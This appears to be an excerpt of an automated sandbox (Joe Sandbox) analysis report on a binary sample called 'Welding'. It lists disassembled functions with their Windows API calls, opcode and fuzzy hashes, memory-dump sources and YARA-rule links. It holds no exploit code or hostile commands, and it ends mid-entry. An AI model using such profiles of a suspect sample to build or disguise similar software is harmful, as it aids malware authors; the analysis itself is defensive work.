Instruction Fuzzy Hash: D42171749082129F8604DF28C8859EEB7F8AF5A364F10462DF4A5C72A2D7309A86CB53

Function 0013634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 001363BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 001363D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 001363E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001363F3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: dfcf4ddf4a19ebe40bb20d2ec21fecc37c27fa3378e2e05e7a392da2955d43a0
Instruction ID: 68db90d04205d5058b2a549a2d310eea51e996c15155767d342337b47932cb94
Opcode Fuzzy Hash: dfcf4ddf4a19ebe40bb20d2ec21fecc37c27fa3378e2e05e7a392da2955d43a0
Instruction Fuzzy Hash: D711AC35305514AFDB05AB24DC55FBA77A9EF86320F148118FA1ACB2E2CBB5AD408B94

Function 0010E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?), ref: 0010F867
Part of subcall function 0010F858: lstrcpyW.KERNEL32(00000000,?,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010F88D
Part of subcall function 0010F858: lstrcmpiW.KERNEL32(00000000,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?), ref: 0010F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E488
lstrcpyW.KERNEL32(00000000,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E4E2

Strings

cdecl, xrefs: 0010E4D9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 6cc7d3295346856cbe8de50783182a3908581a9d46ef9d47d72d35ab283a6864
Instruction ID: 06554c4e41d82400a34f1083a3645febef3d48b146311df88cf19addb02aa59b
Opcode Fuzzy Hash: 6cc7d3295346856cbe8de50783182a3908581a9d46ef9d47d72d35ab283a6864
Instruction Fuzzy Hash: 1711033A100344AFCB25AF25DC09D7A7BE8FF45310B40442BF946CB2A0EBB1D890CBA0

Function 000E5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000E5331

Part of subcall function 000D593C: __FF_MSGBANNER.LIBCMT ref: 000D5953
Part of subcall function 000D593C: __NMSG_WRITE.LIBCMT ref: 000D595A
Part of subcall function 000D593C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000004,?,?,000D1003,?), ref: 000D597F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AllocHeap_free
String ID:
API String ID: 1080816511-0
Opcode ID: 292fad0653d25226ae9daf524b4cd7182bfeff2f9e4f2c519d54a45d8c34ca70
Instruction ID: ca30635f243a26e330c34eeda845a0ccc0e29d5d473fe6194fc1ee08110c3aa6
Opcode Fuzzy Hash: 292fad0653d25226ae9daf524b4cd7182bfeff2f9e4f2c519d54a45d8c34ca70
Instruction Fuzzy Hash: 5C113D31405F45AFCB353F72AC0169E3BD56F153A6F204D27F918A62E2DEB08A808760

Function 000C5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C5B58

Part of subcall function 000C56F8: _memset.LIBCMT ref: 000C5787
Part of subcall function 000C56F8: _wcscpy.LIBCMT ref: 000C57DB
Part of subcall function 000C56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C57EB

KillTimer.USER32(?,00000001,?,?), ref: 000C5BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C5BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00100D7C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 3acbb43137191f7701449e98380af03f0810d33869f0c78e49b4ae4e83764b42
Instruction ID: 3ac0681c76b2058f232dbe7a7daaadb855396ead2988f99d8e95a9f6f9039d57
Opcode Fuzzy Hash: 3acbb43137191f7701449e98380af03f0810d33869f0c78e49b4ae4e83764b42
Instruction Fuzzy Hash: 5521B374504B849FE7738B648C95FEABFECAB09305F04048DE6DA56282C7B439C4DB51

Function 00114365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00114385
_memset.LIBCMT ref: 001143A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001143F8
CloseHandle.KERNEL32(00000000), ref: 00114401

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: d48aa419134e5449774d16529e74c022a712185470bbd8bfeeea6ce1709e8088
Instruction ID: 8313ddadf310c2239499731be170c5c64d63f0ae8c8fee3b7495e596e37fc7c8
Opcode Fuzzy Hash: d48aa419134e5449774d16529e74c022a712185470bbd8bfeeea6ce1709e8088
Instruction Fuzzy Hash: 4F11AB759013287AD7309BA5AC4DFEBBB7CEF45B60F1045AAF908D7190D6744E808BA4

Function 00126A54 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00117E51,?,?,00000000), ref: 000C4041
Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00117E51,?,?,00000000,?,?), ref: 000C4065

#52.WSOCK32(?,?,?), ref: 00126A84
#111.WSOCK32(00000000), ref: 00126A8F
_memmove.LIBCMT ref: 00126ABC
#11.WSOCK32(?), ref: 00126AC7

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ByteCharMultiWide$#111_memmove
String ID:
API String ID: 70051993-0
Opcode ID: 691c239393c2eefa9dc0f4f6e3535e18b8074bbf1d3f14bed1b5a066a91e7ab4
Instruction ID: bce9b8db80a655d65f39c2a74f98aba0ab5ceb6f63d722983cb6bafe2c7e2a4c
Opcode Fuzzy Hash: 691c239393c2eefa9dc0f4f6e3535e18b8074bbf1d3f14bed1b5a066a91e7ab4
Instruction Fuzzy Hash: 9B115E76900109AFCB05EFA4DD86DEEB7B8AF19310B144065F506A72A3DF31AE14CBA1

Function 000B166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

DefDlgProcW.USER32(?,00000020,?), ref: 000B16B4
GetClientRect.USER32(?,?), ref: 000EB93C
GetCursorPos.USER32(?), ref: 000EB946
ScreenToClient.USER32(?,?), ref: 000EB951

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: bca99c1f6146d00e9fab0e970064d1b2290a292cf381119c8d7fafa91bf63e63
Instruction ID: 4479b03112feabb9ed7c72e869a45ffad9d2eb6b43fbd7058e93d6689e66668e
Opcode Fuzzy Hash: bca99c1f6146d00e9fab0e970064d1b2290a292cf381119c8d7fafa91bf63e63
Instruction Fuzzy Hash: FB113639A00019AFCB10EF98D899DFE77B8FB09301F940455FA51E7551D730BA91CBA1

Function 001096F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00109719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0010972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00109741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0010975C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9269195ac182eab385e99429f124a3b263a8ca9ca2efd775500f72addb4bb490
Instruction ID: 5fa282000587dad00169333bbc53176b248873608f18e999d7ef1325914081f8
Opcode Fuzzy Hash: 9269195ac182eab385e99429f124a3b263a8ca9ca2efd775500f72addb4bb490
Instruction Fuzzy Hash: C011487A901218FFEB11DF95C984E9DBBB8FB48710F204091EA04B7290D771AE10DB90

Function 000B2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
GetStockObject.GDI32(00000011), ref: 000B2163
SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: b1d99c418e525c679ed6e9592fce63f4273de73dbc861d87536fa43e390d5c4c
Instruction ID: d9e2d4ca80e5a90836188d5b9a8282d0d280da7a01a4c454ce3104b67dfb5e3c
Opcode Fuzzy Hash: b1d99c418e525c679ed6e9592fce63f4273de73dbc861d87536fa43e390d5c4c
Instruction Fuzzy Hash: E911ADB2101149BFDF124F94DC44EEB7BA9EF69394F050105FB0456120C731DCA0DBA1

Function 00111941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 0011195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 00111983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 0011198D
Sleep.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 001119C0

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d25d72c092a4ce985ecff7480bae20153f5cfd846c115f7f82825179a8364fdd
Instruction ID: d5c00dbea091c6f79cddd0c205b4eb042bb5d556e2d5984a094baa31455afce5
Opcode Fuzzy Hash: d25d72c092a4ce985ecff7480bae20153f5cfd846c115f7f82825179a8364fdd
Instruction Fuzzy Hash: 34115A31C0061CEBCF089FA5D958BEEFB78FF09701F014066EA90B2240CB3096908B95

Function 0013E1CE Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0013E1EA
#183.OLEAUT32(?,00000002,0000000C), ref: 0013E201
#163.OLEAUT32(0000000C,?,00000000), ref: 0013E216
#442.OLEAUT32(0000000C,?,00000000), ref: 0013E234

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: #163#183#442FileModuleName
String ID:
API String ID: 2875472535-0
Opcode ID: 59e3882d34e41340e6cbc5a4199b97400fe4e798e1bf691a0040a76ee9bd7243
Instruction ID: 916338a8c3619c2e8e6aef423f06a9367f833958bb975a77e6046414b70e73a7
Opcode Fuzzy Hash: 59e3882d34e41340e6cbc5a4199b97400fe4e798e1bf691a0040a76ee9bd7243
Instruction Fuzzy Hash: 181161B5205314DBE3308F51DD08F93BBFCEB04B10F108559A716D6590D7B1E5449FA1

Function 000E71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 000E720B

Part of subcall function 000E78F2: __fltout2.LIBCMT ref: 000E791B

__cftog_l.LIBCMT ref: 000E7231
__cftoe_l.LIBCMT ref: 000E7263

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 7db646e8c9d7fdf37307101b320764bfab7cad9fc818dcf03288e0cdbcafbc9c
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 04014C7204818EBFCF165E86CC418EE3F62BB19354B588519FA1C68131D336C9B1AB91

Function 0013B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0013B956
ScreenToClient.USER32(?,?), ref: 0013B96E
ScreenToClient.USER32(?,?), ref: 0013B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0013B9AD

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e4737458c602b4514441c4472806946d4eba18fc008a84cc6c62d27313592d73
Instruction ID: afe5ae074dbcb37a0f32ae2ee4cb42caefe8d094c370c6bafc728492ba777abc
Opcode Fuzzy Hash: e4737458c602b4514441c4472806946d4eba18fc008a84cc6c62d27313592d73
Instruction Fuzzy Hash: DD1163B9D04209EFDB41CF99C884AEEBBF9FB49310F104156E915E3620E731AA618F50

Function 0013BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0013BCB6
_memset.LIBCMT ref: 0013BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00178F20,00178F64), ref: 0013BCF4
CloseHandle.KERNEL32 ref: 0013BD06

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: c00aa19086afef6364bf4cacb80018b059bf96de4b04a738a5848f46206c584b
Instruction ID: c32355222da3b13e6190c9eb238f2fa3e7d8a2057016ac79fd457e6b89df99fd
Opcode Fuzzy Hash: c00aa19086afef6364bf4cacb80018b059bf96de4b04a738a5848f46206c584b
Instruction Fuzzy Hash: 0EF05EB26803047FE2502B65AC09FBB3E6DEB09754F004421FB0CE55A2DB72489087B9

Function 00117195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 001171A1

Part of subcall function 00117C7F: _memset.LIBCMT ref: 00117CB4

_memmove.LIBCMT ref: 001171C4
_memset.LIBCMT ref: 001171D1
LeaveCriticalSection.KERNEL32(?), ref: 001171E1

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 73d967ca5550dcced027dc0d2fd421245e1bab2f32e5502f625e262ec80fc63a
Instruction ID: 3b4c475a20e7ccfd55a5908e3218137b70b8d3ef6113fc61cb787ce92c14a8e4
Opcode Fuzzy Hash: 73d967ca5550dcced027dc0d2fd421245e1bab2f32e5502f625e262ec80fc63a
Instruction Fuzzy Hash: 38F0303A100100ABCB016F55DC85B8ABB29EF49360F04C061FE085E26BCB71A951DBB4

Function 0013C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 000B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1738
Part of subcall function 000B16CF: BeginPath.GDI32(?), ref: 000B174F
Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0013C3E8
LineTo.GDI32(00000000,?,?), ref: 0013C3F5
EndPath.GDI32(00000000), ref: 0013C405
StrokePath.GDI32(00000000), ref: 0013C413

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: e3b0744b7152847d3ac88f69dbc5a2caef3b9f586be5378dc939ba314253ea58
Instruction ID: d65d51916182e330d40834443edb88ad972d8c93a826f669c2b96c775cdf9c34
Opcode Fuzzy Hash: e3b0744b7152847d3ac88f69dbc5a2caef3b9f586be5378dc939ba314253ea58
Instruction Fuzzy Hash: 0CF0BE35105218BADB236F51AC0DFCE3F69AF0A350F048000FB51624F283B45591DBE9

Function 0010AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

